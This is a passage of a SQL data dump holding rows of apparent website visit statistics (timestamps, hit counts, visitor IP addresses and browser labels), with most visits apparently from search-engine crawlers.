ther'),(175243,1510103733,1,1,0,0,'51.255.65.67','other'),(175244,1510103735,1,1,0,0,'51.255.71.121','other'),(175245,1510104043,1,1,0,0,'66.249.66.157','chrome'),(175246,1510104997,1,1,0,0,'216.244.66.237','other'),(175247,1510105255,1,1,0,0,'157.55.39.206','other'),(175248,1510105506,1,1,0,0,'80.252.154.233','chrome'),(175249,1510105511,1,1,0,0,'8.29.198.25','other'),(175250,1510105858,1,1,0,0,'66.249.76.109','chrome'),(175251,1510105923,1,1,0,0,'5.3.153.196','msie'),(175252,1510105962,1,1,0,0,'51.255.65.79','other'),(175253,1510106613,1,1,0,0,'51.255.65.75','other'),(175254,1510106641,1,1,0,0,'40.77.167.48','other'),(175255,1510107009,1,1,0,0,'51.255.65.64','other'),(175256,1510107010,1,1,0,0,'51.255.71.122','other'),(175257,1510107828,1,1,0,0,'217.182.132.154','other'),(175258,1510108778,1,1,0,0,'51.255.65.64','other'),(175259,1510109012,1,1,0,0,'51.255.65.15','other'),(175260,1510109026,1,0,1,0,'66.249.66.157',''),(175261,1510109132,1,1,0,0,'180.76.15.157','other'),(175262,1510109883,1,1,0,0,'217.182.132.94','other'),(175263,1510111008,1,1,0,0,'54.165.59.7','other'),(175264,1510111700,1,1,0,0,'217.182.132.64','other'),(175265,1510111705,1,1,0,0,'51.255.71.122','other'),(175266,1510111716,1,1,0,0,'51.255.65.8','other'),(175267,1510112383,1,1,0,0,'66.249.66.76','chrome'),(175268,1510112398,1,0,1,0,'66.249.66.75',''),(175269,1510112459,1,1,0,0,'164.132.164.180','other'),(175270,1510112613,1,0,1,0,'66.249.76.93',''),(175271,1510113133,2,2,0,0,'54.165.59.7','other'),(175272,1510113461,1,1,0,0,'217.69.133.23','other'),(175273,1510113516,1,1,0,0,'217.182.132.183','other'),(175274,1510113762,1,1,0,0,'157.55.39.206','other'),(175275,1510113805,1,0,1,0,'66.249.76.108',''),(175276,1510113972,1,1,0,0,'51.255.71.113','other'),(175277,1510114039,8,8,0,0,'46.229.168.70','other'),(175278,1510114058,1,1,0,0,'213.180.203.40','other'),(175279,1510114061,3,3,0,0,'46.229.168.69','other'),(175280,1510114089,5,5,0,0,'46.229.168.77','other'),(175281,1510114109,7,7,0,0,'46.229.168.65','other'),(175282,1510114145,3,3,0,0,'46.229.168.80','other'),(175283,1510114160,5,5,0,0,'46.229.168.71','other'),(175284,1510114186,3,3,0,0,'46.229.168.76','other'),(175285,1510114198,1,1,0,0,'178.154.171.4','other'),(175287,1510114219,3,3,0,0,'46.229.168.79','other'),(175288,1510114234,6,6,0,0,'46.229.168.72','other'),(175289,1510114343,4,4,0,0,'46.229.168.73','other'),(175290,1510114376,7,7,0,0,'46.229.168.67','other'),(175291,1510114394,1,1,0,0,'217.182.132.97','other'),(175292,1510114436,12,12,0,0,'46.229.168.68','other'),(175293,1510114556,1,1,0,0,'66.249.66.155','chrome'),(175294,1510114723,1,1,0,0,'51.255.64.106','other'),(175295,1510114730,6,6,0,0,'46.229.168.66','other'),(175296,1510114959,6,6,0,0,'46.229.168.70','other'),(175297,1510114994,6,6,0,0,'46.229.168.69','other'),(175298,1510115102,2,2,0,0,'46.229.168.80','other'),(175299,1510115123,4,4,0,0,'46.229.168.65','other'),(175300,1510115146,2,2,0,0,'46.229.168.77','other'),(175301,1510115213,3,3,0,0,'46.229.168.72','other'),(175302,1510115233,2,2,0,0,'46.229.168.76','other'),(175303,1510115302,8,8,0,0,'46.229.168.71','other'),(175304,1510115338,6,6,0,0,'46.229.168.74','other'),(175305,1510115367,4,4,0,0,'46.229.168.78','other'),(175306,1510115487,6,6,0,0,'46.229.168.67','other'),(175307,1510115553,8,8,0,0,'46.229.168.73','other'),(175308,1510115686,4,4,0,0,'46.229.168.79','other'),(175309,1510115687,1,0,1,0,'66.249.66.157',''),(175310,1510115743,12,12,0,0,'46.229.168.68','other'),(175311,1510115776,1,1,0,0,'46.229.168.75','other'),(175312,1510115981,1,1,0,0,'46.201.177.248','chrome'),(175313,1510116060,3,3,0,0,'46.229.168.65','other'),(175314,1510116122,1,1,0,0,'157.55.39.206','other'),(175315,1510116123,4,4,0,0,'46.229.168.69','other'),(175316,1510116233,4,4,0,0,'46.229.168.71','other'),(175317,1510116235,2,2,0,0,'46.229.168.70','other'),(175318,1510116295,6,6,0,0,'46.229.168.66','other'),(175319,1510116332,1,1,0,0,'8.29.198.27','other'),(175320,1510116338,2,2,0,0,'46.229.168.78','other'),(175321,1510116413,4,4,0,0,'46.229.168.67','other'),(175322,1510116466,5,5,0,0,'46.229.168.72','other'),(175323,1510116480,8,8,0,0,'46.229.168.80','other'),(175324,1510116563,5,5,0,0,'46.229.168.76','other'),(175325,1510116700,4,4,0,0,'46.229.168.68','other'),(175326,1510116810,4,4,0,0,'46.229.168.79','other'),(175327,1510116955,4,4,0,0,'46.229.168.74','other'),(175328,1510117009,8,8,0,0,'46.229.168.65','other'),(175329,1510117011,1,1,0,0,'66.249.76.89','chrome'),(175330,1510117119,3,3,0,0,'46.229.168.73','other'),(175331,1510117264,2,2,0,0,'46.229.168.69','other'),(175332,1510117269,2,0,2,0,'66.249.66.74',''),(175333,1510117336,11,11,0,0,'46.229.168.67','other'),(175334,1510117356,4,4,0,0,'46.229.168.66','other'),(175335,1510117407,1,1,0,0,'94.156.144.191','firefox'),(175336,1510117442,2,2,0,0,'46.229.168.78','other'),(175337,1510117553,1,1,0,0,'46.229.168.71','other'),(175338,1510117565,1,1,0,0,'51.255.71.132','other'),(175339,1510117607,6,6,0,0,'46.229.168.76','other'),(175340,1510117624,4,4,0,0,'46.229.168.72','other'),(175341,1510117647,2,2,0,0,'46.229.168.70','other'),(175342,1510117675,1,1,0,0,'46.229.168.75','other'),(175343,1510117777,4,4,0,0,'46.229.168.77','other'),(175344,1510117793,6,6,0,0,'46.229.168.79','other'),(175345,1510117810,6,6,0,0,'46.229.168.80','other'),(175346,1510117975,6,6,0,0,'46.229.168.68','other'),(175347,1510118010,1,0,1,0,'66.249.76.107',''),(175348,1510118041,4,4,0,0,'46.229.168.65','other'),(175349,1510118098,3,3,0,0,'46.229.168.73','other'),(175350,1510118224,1,1,0,0,'217.182.132.147','other'),(175351,1510118287,1,1,0,0,'46.229.168.66','other'),(175352,1510118433,4,4,0,0,'46.229.168.69','other'),(175353,1510118459,6,6,0,0,'46.229.168.71','other'),(175354,1510118461,1,1,0,0,'176.193.85.90','msie'),(175355,1510118521,4,4,0,0,'46.229.168.67','other'),(175356,1510118581,7,7,0,0,'46.229.168.70','other'),(175357,1510118623,3,3,0,0,'46.229.168.74','other'),(175358,1510118690,2,2,0,0,'46.229.168.76','other'),(175359,1510118796,2,2,0,0,'46.229.168.78','other'),(175360,1510118842,5,5,0,0,'46.229.168.79','other'),(175361,1510118864,4,4,0,0,'46.229.168.72','other'),(175362,1510118910,1,1,0,0,'51.255.65.18','other'),(175363,1510118938,4,4,0,0,'46.229.168.80','other'),(175364,1510118964,1,0,1,0,'66.249.76.109',''),(175365,1510119036,5,5,0,0,'46.229.168.65','other'),(175366,1510119091,3,3,0,0,'46.229.168.77','other'),(175367,1510119163,6,6,0,0,'46.229.168.68','other'),(175368,1510119286,4,4,0,0,'46.229.168.73','other'),(175369,1510119397,1,1,0,0,'137.74.201.108','other'),(175370,1510119422,2,2,0,0,'46.229.168.67','other'),(175371,1510119483,3,3,0,0,'46.229.168.71','other'),(175372,1510119524,4,4,0,0,'46.229.168.66','other'),(175373,1510119693,1,1,0,0,'46.229.168.70','other'),(175374,1510119821,1,1,0,0,'46.229.168.74','other'),(175375,1510119841,2,2,0,0,'46.229.168.76','other'),(175376,1510119848,2,2,0,0,'46.229.168.75','other'),(175377,1510119855,1,1,0,0,'46.229.168.69','other'),(175378,1510119874,1,1,0,0,'51.255.65.36','other'),(175379,1510120264,1,1,0,0,'217.182.132.86','other'),(175380,1510120490,1,1,0,0,'66.249.66.157','chrome'),(175381,1510121231,1,1,0,0,'51.255.65.52','other'),(175382,1510121706,1,1,0,0,'217.182.132.184','other'),(175383,1510121851,1,0,1,0,'66.249.66.76',''),(175384,1510121960,1,1,0,0,'217.182.132.84','other'),(175385,1510122129,1,1,0,0,'164.132.162.159','other'),(175386,1510122307,1,1,0,0,'164.132.162.157','other'),(175387,1510123189,1,1,0,0,'51.255.65.92','other'),(175388,1510123660,1,0,1,0,'66.249.76.109',''),(175389,1510123809,1,0,1,0,'66.249.76.107',''),(175390,1510123838,1,1,0,0,'217.182.132.30','other'),(175391,1510124461,1,1,0,0,'51.255.71.115','other'),(175392,1510124465,1,1,0,0,'51.255.65.57','other'),(175393,1510124722,1,1,0,0,'66.249.66.75','chrome'),(175394,1510125008,1,0,1,0,'66.249.66.76',''),(175395,1510125189,1,0,1,0,'66.249.76.93',''),(175396,1510125280,1,1,0,0,'51.255.71.131','other'),(175397,1510125741,1,1,0,0,'51.255.65.25','other'),(175398,1510125862,1,1,0,0,'91.196.178.70','chrome'),(175399,1510125957,1,1,0,0,'164.132.162.154','other'),(175400,1510126293,1,1,0,0,'217.182.132.27','other'),(175401,1510126408,1,1,0,0,'217.182.132.35','other'),(175402,1510126519,1,0,1,0,'66.249.76.89',''),(175403,1510126703,1,1,0,0,'51.255.71.116','other'),(175404,1510127016,1,1,0,0,'91.196.178.70','chrome'),(175405,1510127160,1,1,0,0,'8.29.198.26','other'),(175406,1510127457,1,1,0,0,'164.132.162.154','other'),(175407,1510127754,1,1,0,0,'35.184.189.105','other'),(175408,1510128506,1,1,0,0,'91.196.178.70','chrome'),(175409,1510128716,1,0,1,0,'66.249.66.76',''),(175410,1510128771,1,1,0,0,'66.249.66.155','chrome'),(175411,1510129081,1,1,0,0,'137.74.201.99','other'),(175412,1510129275,1,1,0,0,'51.255.65.37','other'),(175413,1510129415,1,1,0,0,'51.255.65.62','other'),(175414,1510129494,1,1,0,0,'137.74.207.109','other'),(175415,1510129510,1,0,1,0,'66.249.66.156',''),(175416,1510129657,1,1,0,0,'46.201.240.112','firefox'),(175417,1510130220,1,1,0,0,'91.196.178.70','firefox'),(175418,1510130259,1,1,0,0,'217.182.132.181','other'),(175419,1510130604,1,1,0,0,'51.255.71.129','other'),(175420,1510130638,1,0,1,0,'66.249.76.109',''),(175421,1510131321,1,1,0,0,'91.196.178.164','chrome'),(175422,1510131324,1,1,0,0,'194.187.104.147','chrome'),(175423,1510131639,1,0,1,0,'66.249.76.93',''),(175424,1510131644,1,1,0,0,'217.182.132.95','other'),(175425,1510131690,1,1,0,0,'195.69.222.18','chrome'),(175426,1510132005,1,1,0,0,'51.255.65.39','other'),(175427,1510132041,1,1,0,0,'51.255.65.17','other'),(175428,1510132628,1,1,0,0,'95.108.181.111','other'),(175429,1510132706,1,1,0,0,'5.45.207.30','other'),(175430,1510132908,1,1,0,0,'46.174.125.28','chrome'),(175431,1510133116,1,1,0,0,'217.182.132.54','other'),(175432,1510133250,1,1,0,0,'91.196.178.68','chrome'),(175433,1510133640,1,1,0,0,'217.182.132.178','other'),(175434,1510134306,2,2,0,0,'35.184.189.105','other'),(175435,1510134330,1,1,0,0,'151.80.27.118','other'),(175436,1510134494,1,1,0,0,'217.182.132.79','other'),(175437,1510134836,1,1,0,0,'216.244.66.237','other'),(175438,1510135118,1,1,0,0,'178.137.83.153','chrome'),(175439,1510135718,1,1,0,0,'164.132.162.187','other'),(175440,1510136410,1,1,0,0,'217.182.132.22','other'),(175441,1510136622,1,1,0,0,'91.196.178.67','chrome'),(175442,1510136793,1,1,0,0,'137.74.203.194','other'),(175443,1510136818,1,1,0,0,'217.182.132.65','other'),(175444,1510137151,1,1,0,0,'91.196.178.70','chrome'),(175445,1510137189,1,0,1,0,'66.249.76.89',''),(175446,1510137478,1,1,0,0,'217.182.132.69','other'),(175447,1510137521,1,1,0,0,'164.132.162.154','other'),(175448,1510137990,1,1,0,0,'8.29.198.26','other'),(175449,1510138102,1,1,0,0,'195.54.42.18','chrome'),(175450,1510138781,1,1,0,0,'217.182.132.33','other'),(175451,1510138832,1,1,0,0,'137.74.207.120','other'),(175452,1510138941,1,1,0,0,'51.255.65.69','other'),(175453,1510139011,1,1,0,0,'217.182.132.146','other'),(175454,1510139597,1,1,0,0,'51.255.65.77','other'),(175455,1510139936,1,1,0,0,'51.255.65.89','other'),(175456,1510140243,1,1,0,0,'51.255.65.95','other'),(175457,1510140431,1,1,0,0,'5.45.207.69','other'),(175458,1510141371,1,1,0,0,'51.255.71.131','other'),(175459,1510142045,2,2,0,0,'141.8.132.22','other'),(175460,1510142048,1,1,0,0,'5.45.207.30','other'),(175461,1510142076,1,1,0,0,'37.9.113.63','other'),(175462,1510142160,2,2,0,0,'178.154.171.10','other'),(175463,1510142194,1,1,0,0,'104.223.94.234','firefox'),(175464,1510142233,2,2,0,0,'37.9.113.134','other'),(175465,1510142266,1,1,0,0,'217.69.133.231','other'),(175466,1510142267,1,1,0,0,'5.45.207.82','other'),(175467,1510142358,1,1,0,0,'37.9.113.132','other'),(175468,1510142463,2,2,0,0,'37.9.113.100','other'),(175469,1510142473,2,2,0,0,'37.9.113.115','other'),(175470,1510142652,1,1,0,0,'141.8.142.74','other'),(175471,1510142668,1,1,0,0,'51.255.65.11','other'),(175472,1510142671,2,2,0,0,'37.9.113.157','other'),(175473,1510142685,1,1,0,0,'5.45.207.58','other'),(175474,1510142713,1,1,0,0,'213.180.203.40','other'),(175475,1510142717,1,1,0,0,'5.45.207.83','other'),(175476,1510142819,1,1,0,0,'87.250.224.85','other'),(175477,1510142821,1,1,0,0,'51.255.65.74','other'),(175478,1510142883,1,1,0,0,'5.45.207.49','other'),(175479,1510142985,1,1,0,0,'37.9.113.101','other'),(175480,1510142986,1,1,0,0,'207.46.13.85','other'),(175481,1510143108,1,1,0,0,'178.154.200.8','other'),(175482,1510143217,1,1,0,0,'37.9.113.182','other'),(175483,1510143275,1,1,0,0,'178.154.171.81','other'),(175484,1510143355,1,1,0,0,'91.196.178.70','firefox'),(175485,1510143388,1,1,0,0,'217.182.132.71','other'),(175486,1510143418,1,1,0,0,'141.8.132.22','other'),(175487,1510143437,1,1,0,0,'178.154.171.10','other'),(175488,1510143815,1,1,0,0,'51.255.71.130','other'),(175489,1510144015,1,1,0,0,'87.250.224.46','other'),(175490,1510144048,1,1,0,0,'91.196.178.165','chrome'),(175491,1510144130,1,1,0,0,'137.74.207.108','other'),(175492,1510144275,1,1,0,0,'141.8.142.74','other'),(175493,1510144295,1,1,0,0,'37.9.113.101','other'),(175494,1510144307,1,1,0,0,'141.8.132.19','other'),(175495,1510144316,1,1,0,0,'178.154.171.4','other'),(175496,1510144401,1,1,0,0,'51.255.65.97','other'),(175497,1510144482,28,28,0,0,'62.210.251.247','other'),(175498,1510144530,1,0,1,0,'66.249.66.74',''),(175499,1510144978,2,2,0,0,'91.196.178.70','chrome'),(175500,1510145036,1,1,0,0,'164.132.162.158','other'),(175501,1510145118,1,1,0,0,'217.182.132.69','other'),(175502,1510145372,1,1,0,0,'178.154.171.88','other'),(175503,1510145456,1,1,0,0,'87.250.224.46','other'),(175504,1510146431,1,1,0,0,'37.9.113.115','other'),(175505,1510146434,1,1,0,0,'37.9.113.114','other'),(175506,1510146450,1,1,0,0,'87.250.224.46','other'),(175507,1510146479,1,0,1,0,'66.249.66.155',''),(175508,1510146806,1,1,0,0,'91.196.178.104','chrome'),(175509,1510146864,1,1,0,0,'51.255.65.28','other'),(175510,1510146946,1,1,0,0,'37.52.18.117','firefox'),(175511,1510147371,1,1,0,0,'141.8.132.19','other'),(175512,1510147389,1,1,0,0,'37.9.113.115','other'),(175513,1510148105,1,1,0,0,'217.182.132.53','other'),(175514,1510148193,1,1,0,0,'217.182.132.150','other'),(175515,1510148295,1,1,0,0,'217.69.133.14','other'),(175516,1510148482,1,1,0,0,'91.196.178.70','chrome'),(175517,1510148731,1,1,0,0,'51.255.65.29','other'),(175518,1510148831,1,1,0,0,'8.29.198.27','other'),(175519,1510148869,1,1,0,0,'217.182.132.81','other'),(175520,1510149523,1,1,0,0,'217.182.132.94','other'),(175521,1510149576,1,1,0,0,'216.244.66.237','other'),(175522,1510149916,1,1,0,0,'91.196.178.70','chrome'),(175523,1510149933,1,1,0,0,'37.9.113.138','other'),(175524,1510150043,1,1,0,0,'91.196.178.68','chrome'),(175525,1510150408,1,1,0,0,'137.74.207.110','other'),(175526,1510151021,1,1,0,0,'217.182.132.16','other'),(175527,1510151420,1,1,0,0,'51.255.65.96','other'),(175528,1510151746,1,1,0,0,'217.182.132.179','other'),(175529,1510151843,1,0,1,0,'66.249.76.113',''),(175530,1510152098,1,1,0,0,'51.255.65.50','other'),(175531,1510152279,1,1,0,0,'91.124.135.183','firefox'),(175532,1510152519,1,1,0,0,'107.167.104.96','other'),(175533,1510152644,1,1,0,0,'199.58.86.211','other'),(175534,1510152879,1,1,0,0,'216.244.66.237','other'),(175535,1510153506,1,1,0,0,'66.249.66.155','chrome'),(175536,1510154013,1,1,0,0,'195.230.119.34','chrome'),(175537,1510154590,1,1,0,0,'51.255.65.8','other'),(175538,1510154651,1,1,0,0,'151.80.203.177','chrome'),(175539,1510154663,1,1,0,0,'37.115.66.0','other'),(175540,1510155201,1,1,0,0,'178.154.171.88','other'),(175541,1510155205,1,1,0,0,'87.250.224.46','other'),(175542,1510155236,1,1,0,0,'51.255.65.48','other'),(175543,1510155333,1,1,0,0,'217.182.132.55','other'),(175544,1510155456,1,1,0,0,'217.182.132.147','other'),(175545,1510155728,1,1,0,0,'37.9.113.157','other'),(175546,1510155952,1,1,0,0,'137.74.207.109','other'),(175547,1510156268,1,1,0,0,'217.182.132.59','other'),(175548,1510156611,1,1,0,0,'188.163.66.11','chrome'),(175549,1510156642,1,1,0,0,'51.255.65.60','other'),(175550,1510157258,1,1,0,0,'217.182.132.52','other'),(175551,1510158265,1,1,0,0,'217.69.133.250','other'),(175552,1510158275,1,1,0,0,'217.182.132.181','other'),(175553,1510158467,1,1,0,0,'217.182.132.178','other'),(175554,1510159400,1,1,0,0,'137.74.203.194','other'),(175555,1510159556,1,1,0,0,'35.184.189.105','other'),(175556,1510159651,1,1,0,0,'51.255.65.71','other'),(175557,1510159665,1,1,0,0,'8.29.198.27','other'),(175558,1510159735,1,1,0,0,'51.255.65.47','other'),(175559,1510160083,1,1,0,0,'217.182.132.91','other'),(175560,1510160492,1,1,0,0,'51.255.65.29','other'),(175561,1510160817,1,1,0,0,'51.255.65.50','other'),(175562,1510160872,1,1,0,0,'217.182.132.31','other'),(175563,1510160910,1,0,1,0,'66.249.66.75',''),(175564,1510161046,1,1,0,0,'151.80.203.177','chrome'),(175565,1510162164,1,1,0,0,'91.196.178.69','firefox'),(175566,1510162943,1,1,0,0,'216.244.66.237','other'),(175567,1510163260,1,1,0,0,'51.255.65.224','other'),(175568,1510164463,1,1,0,0,'217.182.132.174','other'),(175569,1510164891,1,1,0,0,'217.182.132.180','other'),(175570,1510164991,2,0,2,0,'66.249.76.131',''),(175571,1510165104,1,1,0,0,'164.132.162.156','other'),(175572,1510165504,1,1,0,0,'217.182.132.95','other'),(175573,1510165799,1,1,0,0,'89.178.232.87','other'),(175574,1510166111,1,1,0,0,'51.255.65.40','other'),(175575,1510166282,1,1,0,0,'37.145.73.87','msie'),(175576,1510166294,1,1,0,0,'51.255.65.8','other'),(175577,1510166431,1,1,0,0,'207.46.13.85','other'),(175578,1510166683,1,1,0,0,'178.154.171.4','other'),(175579,1510168033,1,1,0,0,'51.255.71.132','other'),(175580,1510168113,1,1,0,0,'37.9.113.182','other'),(175581,1510168279,1,1,0,0,'51.255.65.57','other'),(175582,1510168694,1,1,0,0,'217.182.132.190','other'),(175583,1510169407,1,1,0,0,'217.182.132.34','other'),(175584,1510169627,1,0,1,0,'66.249.76.112',''),(175585,1510169822,1,1,0,0,'137.74.207.102','other'),(175586,1510169969,1,1,0,0,'207.46.13.85','other'),(175587,1510170144,1,1,0,0,'217.182.132.20','other'),(175588,1510170339,1,1,0,0,'157.55.39.206','other'),(175589,1510170408,1,1,0,0,'51.255.65.44','other'),(175590,1510170494,1,1,0,0,'8.29.198.27','other'),(175591,1510171099,1,1,0,0,'213.110.139.33','firefox'),(175592,1510171344,1,1,0,0,'151.80.27.118','other'),(175593,1510171561,1,1,0,0,'178.95.156.151','chrome'),(175594,1510171643,1,1,0,0,'51.255.65.58','other'),(175595,1510171753,1,1,0,0,'217.182.132.240','other'),(175596,1510171896,1,0,1,0,'66.249.76.131',''),(175597,1510172161,1,1,0,0,'217.182.132.187','other'),(175598,1510172647,1,1,0,0,'51.255.65.48','other'),(175599,1510172981,1,1,0,0,'51.255.65.42','other'),(175600,1510173387,1,1,0,0,'51.255.71.113','other'),(175601,1510173465,10,10,0,0,'46.229.166.195','firefox'),(175602,1510173475,1,1,0,0,'46.229.166.195','chrome'),(175603,1510173604,1,1,0,0,'51.255.71.110','other'),(175604,1510173677,1,1,0,0,'217.182.132.82','other'),(175605,1510174293,1,1,0,0,'157.55.39.159','other'),(175606,1510175423,1,1,0,0,'51.255.65.8','other'),(175607,1510175436,1,1,0,0,'217.182.132.75','other'),(175608,1510176555,1,1,0,0,'141.8.142.96','other'),(175609,1510176974,1,1,0,0,'217.182.132.171','other'),(175610,1510177279,1,1,0,0,'91.196.178.163','chrome'),(175611,1510177992,1,1,0,0,'51.255.65.55','other'),(175612,1510178316,1,1,0,0,'95.132.183.192','chrome'),(175613,1510178810,1,1,0,0,'37.9.113.110','other'),(175614,1510178953,1,1,0,0,'51.255.65.76','other'),(175615,1510179020,1,1,0,0,'141.8.142.29','other'),(175616,1510179054,1,1,0,0,'217.182.132.185','other'),(175617,1510179257,1,1,0,0,'51.255.65.53','other'),(175618,1510179747,1,1,0,0,'95.24.93.85','msie'),(175619,1510180068,1,1,0,0,'217.182.132.187','other'),(175620,1510180312,1,1,0,0,'178.154.171.24','other'),(175621,1510180712,1,1,0,0,'51.255.65.89','other'),(175622,1510181053,1,1,0,0,'37.9.113.82','other'),(175623,1510181319,1,1,0,0,'8.29.198.25','other'),(175624,1510181495,1,1,0,0,'178.154.171.56','other'),(175625,1510181508,2,2,0,0,'207.46.13.100','other'),(175626,1510182760,1,1,0,0,'217.182.132.193','other'),(175627,1510183243,1,1,0,0,'207.46.13.85','other'),(175628,1510183753,1,1,0,0,'217.182.132.34','other'),(175629,1510184503,1,1,0,0,'51.255.65.82','other'),(175630,1510184668,1,1,0,0,'51.255.65.26','other'),(175631,1510185100,1,1,0,0,'37.9.113.138','other'),(175632,1510185331,1,1,0,0,'137.74.207.110','other'),(175633,1510186878,1,1,0,0,'178.154.200.32','other'),(175634,1510187010,1,1,0,0,'51.255.71.116','other'),(175635,1510187326,1,1,0,0,'164.132.164.180','other'),(175636,1510188108,1,1,0,0,'37.9.113.80','other'),(175637,1510188168,1,1,0,0,'217.182.132.171','other'),(175638,1510188309,1,1,0,0,'51.255.65.96','other'),(175639,1510188522,1,1,0,0,'37.9.113.56','other'),(175640,1510188693,1,1,0,0,'217.182.132.18','other'),(175641,1510189308,1,1,0,0,'5.45.207.58','other'),(175642,1510189313,1,1,0,0,'141.8.142.74','other'),(175643,1510190047,1,1,0,0,'141.8.142.29','other'),(175644,1510190071,1,1,0,0,'51.255.65.40','other'),(175645,1510190425,1,1,0,0,'37.9.113.134','other'),(175646,1510190612,1,1,0,0,'95.108.213.24','other'),(175647,1510190620,1,1,0,0,'137.74.207.114','other'),(175648,1510190731,1,1,0,0,'217.182.132.183','other'),(175649,1510190755,1,1,0,0,'217.182.132.28','other'),(175650,1510191230,1,1,0,0,'178.154.200.28','other'),(175651,1510191607,1,1,0,0,'216.244.66.237','other'),(175652,1510191663,1,1,0,0,'217.182.132.177','other'),(175653,1510191699,1,1,0,0,'95.108.213.24','other'),(175654,1510191704,1,1,0,0,'87.250.224.96','other'),(175655,1510191724,1,1,0,0,'37.9.113.115','other'),(175656,1510191763,1,1,0,0,'51.255.65.35','other'),(175657,1510192149,1,1,0,0,'8.29.198.26','other'),(175658,1510192635,1,1,0,0,'37.9.113.115','other'),(175659,1510192674,1,1,0,0,'164.132.162.157','other'),(175660,1510192714,1,1,0,0,'217.182.132.154','other'),(175661,1510193084,1,1,0,0,'157.55.39.206','other'),(175662,1510193181,1,1,0,0,'51.255.65.36','other'),(175663,1510193732,1,1,0,0,'51.255.71.100','other'),(175664,1510193891,1,1,0,0,'51.255.65.95','other'),(175665,1510194883,1,1,0,0,'51.255.65.22','other'),(175666,1510194952,1,1,0,0,'217.182.132.187','other'),(175667,1510195077,1,1,0,0,'207.46.13.100','other'),(175668,1510195439,1,1,0,0,'217.182.132.71','other'),(175669,1510195505,1,1,0,0,'104.223.94.234','firefox'),(175670,1510195782,1,1,0,0,'51.255.65.7','other'),(175671,1510196437,1,1,0,0,'5.228.129.95','msie'),(175672,1510196724,1,1,0,0,'217.182.132.156','other'),(175673,1510196737,1,1,0,0,'37.9.113.82','other'),(175674,1510197822,1,1,0,0,'37.9.113.60','other'),(175675,1510197991,1,1,0,0,'178.154.171.60','other'),(175676,1510198357,1,1,0,0,'141.8.142.126','other'),(175677,1510198824,1,1,0,0,'217.182.132.80','other'),(175678,1510201246,1,1,0,0,'5.45.207.69','other'),(175679,1510201937,1,1,0,0,'157.55.39.206','other'),(175680,1510202513,2,2,0,0,'51.255.71.114','other'),(175681,1510202923,1,1,0,0,'51.255.65.2','other'),(175682,1510202972,1,1,0,0,'8.29.198.27','other'),(175683,1510203508,1,1,0,0,'141.8.142.74','other'),(175684,1510203672,1,1,0,0,'51.255.65.22','other'),(175685,1510204059,1,1,0,0,'217.182.132.55','other'),(175686,1510204266,1,1,0,0,'137.74.207.188','other'),(175687,1510204383,1,1,0,0,'217.182.132.22','other'),(175688,1510204447,1,1,0,0,'217.182.132.5','other'),(175689,1510204947,1,0,1,0,'66.249.76.131',''),(175690,1510205053,1,1,0,0,'95.135.213.112','chrome'),(175691,1510205190,1,1,0,0,'213.180.203.7','other'),(175692,1510205389,1,1,0,0,'157.55.39.147','other'),(175693,1510205456,1,1,0,0,'51.255.65.85','other'),(175694,1510205473,1,1,0,0,'141.8.132.19','other'),(175695,1510205786,2,2,0,0,'217.182.132.71','other'),(175696,1510206141,1,1,0,0,'5.45.207.12','other'),(175697,1510206538,1,1,0,0,'37.9.113.82','other'),(175698,1510206759,1,1,0,0,'217.182.132.71','other'),(175699,1510207706,1,1,0,0,'217.182.132.28','other'),(175700,1510207809,1,1,0,0,'94.178.147.125','firefox'),(175701,1510208382,1,1,0,0,'95.108.181.102','other'),(175702,1510208451,1,1,0,0,'95.135.213.112','chrome'),(175703,1510208545,1,1,0,0,'89.21.73.152','chrome'),(175704,1510208867,1,1,0,0,'91.196.178.71','chrome'),(175705,1510209025,29,29,0,0,'151.80.44.115','other'),(175706,1510209194,1,1,0,0,'217.182.132.7','other'),(175707,1510209442,1,1,0,0,'188.166.83.210','chrome'),(175708,1510210327,1,1,0,0,'51.255.65.4','other'),(175709,1510210328,1,1,0,0,'51.255.65.55','other'),(175710,1510210441,1,1,0,0,'91.196.178.68','chrome'),(175711,1510210492,1,1,0,0,'37.9.113.207','other'),(175712,1510211158,1,1,0,0,'51.255.71.126','other'),(175713,1510211687,1,1,0,0,'217.69.133.70','other'),(175714,1510211740,1,1,0,0,'176.113.209.224','chrome'),(175715,1510212248,1,1,0,0,'37.52.18.117','firefox'),(175716,1510212651,1,1,0,0,'95.220.192.246','msie'),(175717,1510212677,1,1,0,0,'37.55.104.18','chrome'),(175718,1510213238,1,1,0,0,'217.69.134.177','other'),(175719,1510213833,1,1,0,0,'8.29.198.27','other'),(175720,1510214215,1,1,0,0,'91.196.178.132','firefox'),(175721,1510214853,1,1,0,0,'212.1.95.66','chrome'),(175722,1510215121,1,1,0,0,'91.209.11.165','chrome'),(175723,1510216698,1,1,0,0,'180.76.15.137','other'),(175724,1510216879,1,1,0,0,'95.108.213.24','other'),(175725,1510218037,1,1,0,0,'91.209.11.165','chrome'),(175726,1510218160,1,1,0,0,'37.9.113.134','other'),(175727,1510218364,1,1,0,0,'141.8.142.29','other'),(175728,1510218622,1,1,0,0,'141.8.142.96','other'),(175729,1510218756,1,1,0,0,'91.196.178.70','chrome'),(175730,1510219673,1,1,0,0,'193.186.9.117','chrome'),(175731,1510220018,1,1,0,0,'178.154.171.10','other'),(175732,1510220670,1,1,0,0,'176.120.32.82','chrome'),(175733,1510221048,1,1,0,0,'141.8.142.29','other'),(175734,1510221060,1,1,0,0,'178.154.171.60','other'),(175735,1510221307,1,1,0,0,'91.196.178.67','chrome'),(175736,1510222358,1,1,0,0,'46.211.125.100','other'),(175737,1510222641,1,1,0,0,'216.244.66.237','other'),(175738,1510222864,1,1,0,0,'46.219.2.9','other'),(175739,1510224444,1,1,0,0,'207.46.13.85','other'),(175740,1510224681,1,1,0,0,'8.29.198.25','other'),(175741,1510225058,1,1,0,0,'188.166.69.110','chrome'),(175742,1510225297,1,1,0,0,'37.9.113.138','other'),(175743,1510225301,1,1,0,0,'178.154.200.32','other'),(175744,1510226494,1,1,0,0,'216.244.66.237','other'),(175745,1510227060,1,1,0,0,'37.9.113.132','other'),(175746,1510227542,1,1,0,0,'91.196.178.70','firefox'),(175747,1510228201,1,1,0,0,'109.63.206.207','msie'),(175748,1510229268,1,1,0,0,'91.196.178.165','chrome'),(175749,1510229326,1,1,0,0,'37.9.113.134','other'),(175750,1510229456,1,1,0,0,'5.45.207.58','other'),(175751,1510230267,1,1,0,0,'91.196.178.165','chrome'),(175752,1510230463,1,1,0,0,'37.52.18.117','chrome'),(175753,1510230734,1,1,0,0,'51.255.47.44','other'),(175754,1510231574,1,1,0,0,'95.108.181.102','other'),(175755,1510231891,1,1,0,0,'87.250.224.85','other'),(175756,1510232004,1,1,0,0,'141.8.142.50','